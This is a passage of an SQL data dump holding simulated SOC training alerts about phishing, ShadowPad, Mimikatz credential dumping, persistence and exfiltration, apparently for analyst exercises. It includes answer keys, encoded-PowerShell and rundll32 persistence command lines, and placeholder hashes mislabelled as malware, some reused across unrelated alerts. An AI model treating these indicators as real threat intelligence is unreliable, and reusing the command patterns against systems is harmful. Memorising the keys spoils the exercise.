malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Infiltration Detected\",\"date\":\"2026-02-08T19:00:02.575Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1241, 'Malware Execution on Compromised Systems', 'high', 'Endpoint Detection and Response (EDR) System', 'The Yahoyah malware was executed following a successful phishing attack, establishing a foothold on the victim system. This execution allows attackers to maintain control and initiate further espionage activities.', 'Malware Execution', 'T1059: Command and Scripting Interpreter', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"5678\",\"event_type\":\"malware_execution\",\"host_ip\":\"10.0.0.25\",\"host_name\":\"compromised-host\",\"username\":\"victim_user\",\"file_path\":\"C:\\\\Users\\\\victim_user\\\\AppData\\\\Roaming\\\\yahoyah.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"attacker_ip\":\"192.168.1.5\",\"external_ip\":\"203.0.113.10\",\"command_line\":\"C:\\\\Users\\\\victim_user\\\\AppData\\\\Roaming\\\\yahoyah.exe\",\"process_id\":1234,\"parent_process\":\"explorer.exe\"}', '2026-02-07 21:48:09', '2026-02-19 15:45:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches Yahoyah malware signature\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"yahoyah.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Executable file associated with spyware activities\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"victim_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account on the compromised host\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1242, 'Data Exfiltration Detected via Unusual Network Traffic', 'high', 'Network Traffic Analysis', 'In the final phase of the operation, unusual outbound network traffic was detected originating from an internal host (192.168.1.105) towards an external IP (203.0.113.55). The data packets identified were large and encrypted, suggesting potential exfiltration of sensitive data. The files transferred included classified documents under the guise of normal traffic. The external IP is associated with known APT group infrastructure.', 'Data Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.55\",\"protocol\":\"HTTPS\",\"file_hash\":\"bcf5a4e2b3b5c3c9d1f2f3a4b5c6d7e8\",\"filename\":\"classified_docs.zip\",\"user\":\"jdoe\",\"data_size\":\"350MB\",\"action\":\"ALLOW\",\"indicator\":\"High volume encrypted traffic to suspicious IP\"}', '2026-02-07 21:48:09', '2026-02-19 15:46:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal host suspected of data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"bcf5a4e2b3b5c3c9d1f2f3a4b5c6d7e8\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Database\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with anomalous file transmissions.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"classified_docs.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive content.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Corporate Directory\",\"verdict\":\"internal\",\"details\":\"Employee account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'novice', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1243, 'Initial Access via Phishing Email', 'medium', 'Email Gateway Logs', 'A spear-phishing email was detected attempting to compromise user credentials. The email contained a malicious attachment and was sent from a known malicious IP address linked to Earth Lusca. The operation is believed to be in its initial phase.', 'Phishing', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:22:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"sender_email\":\"attacker@example.com\",\"recipient_email\":\"victim@company.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":\"Invoice_2023.pdf\",\"attachment_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"user\":\"jdoe\",\"event_id\":\"EVT-89231\"}', '2026-02-07 21:48:51', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Threat Database\",\"verdict\":\"malicious\",\"details\":\"Email address used in previous phishing attacks by Earth Lusca.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious PDF used in phishing.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_2023.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"Filename format used in previous phishing attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Company user potentially targeted.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Email\",\"date\":\"2026-02-08T19:00:02.577Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1244, 'Execution of ShadowPad Backdoor', 'high', 'Endpoint Detection and Response (EDR) Systems', 'The ShadowPad backdoor was executed on a compromised host, establishing a command and control channel. This indicates a successful second stage of the attack following initial phishing tactics.', 'Malware Execution', 'T1219 - Remote Access Software', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_type\":\"process_creation\",\"host_ip\":\"192.168.1.45\",\"username\":\"jdoe\",\"process_name\":\"svchost.exe\",\"process_command_line\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\",\"malware_filename\":\"ShadowPad.dll\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"attacker_ip\":\"203.0.113.10\",\"destination_port\":443,\"network_protocol\":\"HTTPS\",\"suspicious_domain\":\"malicious-update.com\"}', '2026-02-07 21:48:51', '2026-02-19 04:03:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with ShadowPad.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the ShadowPad DLL file.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"domain_reputation\",\"verdict\":\"malicious\",\"details\":\"Domain used for C2 communication by ShadowPad.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ShadowPad.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"malicious\",\"details\":\"Filename associated with ShadowPad malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1245, 'Persistence via Scheduled Task', 'medium', 'Windows Task Scheduler Logs', 'Earth Lusca has set up a scheduled task to maintain persistence by re-establishing the ShadowPad connection after system reboots.', 'Persistence Mechanism', 'T1053.005', 1, 'new', NULL, '{\"EventID\":\"4698\",\"EventType\":\"Information\",\"TimeCreated\":\"2023-10-01T14:32:00Z\",\"Computer\":\"victim-pc.local\",\"TaskName\":\"\\\\Microsoft\\\\Windows\\\\Update\\\\ShadowPadReconnect\",\"TaskContent\":{\"Author\":\"SYSTEM\",\"TaskToRun\":\"C:\\\\Windows\\\\System32\\\\rundll32.exe C:\\\\ProgramData\\\\ShadowPad\\\\spad.dll,Run\",\"RunAsUser\":\"NT AUTHORITY\\\\SYSTEM\",\"LogonType\":\"Password\",\"Trigger\":\"At system startup\",\"ExternalIP\":\"203.0.113.45\",\"InternalIP\":\"192.168.1.101\",\"MalwareHash\":\"c3fcd3d76192e4007dfb496cca67e13b\",\"CreatedByUser\":\"attacker@maliciousdomain.com\"}}', '2026-02-07 21:48:51', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with Earth Lusca command and control servers\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetworkScan\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"c3fcd3d76192e4007dfb496cca67e13b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash recognized as part of ShadowPad malware\"}},{\"id\":\"artifact_5\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailThreatIntel\",\"verdict\":\"malicious\",\"details\":\"Email linked to Earth Lusca phishing campaigns\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.582Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":\\\"4698\\\",\\\"EventType\\\":\\\"Information\\\",\\\"TimeCreated\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"Computer\\\":\\\"victim-pc.local\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\ShadowPadReconnect\\\",\\\"TaskContent\\\":{\\\"Author\\\":\\\"SYSTEM\\\",\\\"TaskToRun\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\ProgramData\\\\\\\\ShadowPad\\\\\\\\spad.dll,Run\\\",\\\"RunAsUser\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"LogonType\\\":\\\"Password\\\",\\\"Trigger\\\":\\\"At system startup\\\",\\\"ExternalIP\\\":\\\"203.0.113.45\\\",\\\"InternalIP\\\":\\\"192.168.1.101\\\",\\\"MalwareHash\\\":\\\"c3fcd3d76192e4007dfb496cca67e13b\\\",\\\"CreatedByUser\\\":\\\"attacker@maliciousdomain.com\\\"}}\"},{\"timestamp\":\"2026-02-08T18:59:02.582Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":\\\"4698\\\",\\\"EventType\\\":\\\"Information\\\",\\\"TimeCreated\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"Computer\\\":\\\"victim-pc.local\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\ShadowPadReconnect\\\",\\\"TaskContent\\\":{\\\"Author\\\":\\\"SYSTEM\\\",\\\"TaskToRun\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\ProgramData\\\\\\\\ShadowPad\\\\\\\\spad.dll,Run\\\",\\\"RunAsUser\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"LogonType\\\":\\\"Password\\\",\\\"Trigger\\\":\\\"At system startup\\\",\\\"ExternalIP\\\":\\\"203.0.113.45\\\",\\\"InternalIP\\\":\\\"192.168.1.101\\\",\\\"MalwareHash\\\":\\\"c3fcd3d76192e4007dfb496cca67e13b\\\",\\\"CreatedByUser\\\":\\\"attacker@maliciousdomain.com\\\"}}\"},{\"timestamp\":\"2026-02-08T18:58:02.582Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":\\\"4698\\\",\\\"EventType\\\":\\\"Information\\\",\\\"TimeCreated\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"Computer\\\":\\\"victim-pc.local\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\ShadowPadReconnect\\\",\\\"TaskContent\\\":{\\\"Author\\\":\\\"SYSTEM\\\",\\\"TaskToRun\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\ProgramData\\\\\\\\ShadowPad\\\\\\\\spad.dll,Run\\\",\\\"RunAsUser\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"LogonType\\\":\\\"Password\\\",\\\"Trigger\\\":\\\"At system startup\\\",\\\"ExternalIP\\\":\\\"203.0.113.45\\\",\\\"InternalIP\\\":\\\"192.168.1.101\\\",\\\"MalwareHash\\\":\\\"c3fcd3d76192e4007dfb496cca67e13b\\\",\\\"CreatedByUser\\\":\\\"attacker@maliciousdomain.com\\\"}}\"},{\"timestamp\":\"2026-02-08T18:57:02.582Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":\\\"4698\\\",\\\"EventType\\\":\\\"Information\\\",\\\"TimeCreated\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"Computer\\\":\\\"victim-pc.local\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\ShadowPadReconnect\\\",\\\"TaskContent\\\":{\\\"Author\\\":\\\"SYSTEM\\\",\\\"TaskToRun\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\ProgramData\\\\\\\\ShadowPad\\\\\\\\spad.dll,Run\\\",\\\"RunAsUser\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"LogonType\\\":\\\"Password\\\",\\\"Trigger\\\":\\\"At system startup\\\",\\\"ExternalIP\\\":\\\"203.0.113.45\\\",\\\"InternalIP\\\":\\\"192.168.1.101\\\",\\\"MalwareHash\\\":\\\"c3fcd3d76192e4007dfb496cca67e13b\\\",\\\"CreatedByUser\\\":\\\"attacker@maliciousdomain.com\\\"}}\"},{\"timestamp\":\"2026-02-08T18:56:02.582Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":\\\"4698\\\",\\\"EventType\\\":\\\"Information\\\",\\\"TimeCreated\\\":\\\"2023-10-01T14:32:00Z\\\",\\\"Computer\\\":\\\"victim-pc.local\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\ShadowPadReconnect\\\",\\\"TaskContent\\\":{\\\"Author\\\":\\\"SYSTEM\\\",\\\"TaskToRun\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\ProgramData\\\\\\\\ShadowPad\\\\\\\\spad.dll,Run\\\",\\\"RunAsUser\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"LogonType\\\":\\\"Password\\\",\\\"Trigger\\\":\\\"At system startup\\\",\\\"ExternalIP\\\":\\\"203.0.113.45\\\",\\\"InternalIP\\\":\\\"192.168.1.101\\\",\\\"MalwareHash\\\":\\\"c3fcd3d76192e4007dfb496cca67e13b\\\",\\\"CreatedByUser\\\":\\\"attacker@maliciousdomain.com\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1246, 'Lateral Movement with Cobalt Strike', 'high', 'Network Traffic Analysis', 'An unauthorized lateral movement attempt was detected within the network. The attackers employed Cobalt Strike to dump credentials and escalate privileges, aiming to expand access. This activity was identified through suspicious network traffic patterns.', 'Credential Dumping', 'T1003', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:22:36Z\",\"source_ip\":\"185.199.108.153\",\"destination_ip\":\"192.168.1.45\",\"protocol\":\"TCP\",\"source_port\":443,\"destination_port\":5985,\"username\":\"jdoe\",\"process_name\":\"mimikatz.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event_type\":\"CredentialDumping\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\mimikatz.exe\"}', '2026-02-07 21:48:51', '2026-02-19 04:11:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with known threat actor using Cobalt Strike.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal company asset.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with Mimikatz.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1247, 'Exfiltration of Sensitive Data', 'critical', 'Data Loss Prevention (DLP) Tools', 'In the final step of the operation, Earth Lusca exfiltrated sensitive governmental data to an external server. The data was transmitted via an unauthorized file transfer to a known malicious IP address.', 'Data Exfiltration', 'T1048 - Data Exfiltration Over Alternative Protocol', 1, 'closed', NULL, '{\"timestamp\":\"2023-10-15T13:45:00Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.1.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"file_name\":\"confidential_gov_data.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"jdoe\",\"dlp_policy\":\"Sensitive Data Exfiltration Policy\",\"action\":\"blocked\",\"alert_id\":\"ALERT-20231015-0001\"}', '2026-02-07 21:48:51', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous data exfiltration incidents.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_gov_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"DLP Analysis\",\"verdict\":\"suspicious\",\"details\":\"File matches pattern of sensitive governmental data.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Hash Database\",\"verdict\":\"unknown\",\"details\":\"Newly observed hash not seen in previous databases.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Employee account involved in data transfer.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.584Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"confidential_gov_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration Policy\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"ALERT-20231015-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.584Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"confidential_gov_data.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration Policy\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"ALERT-20231015-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.584Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 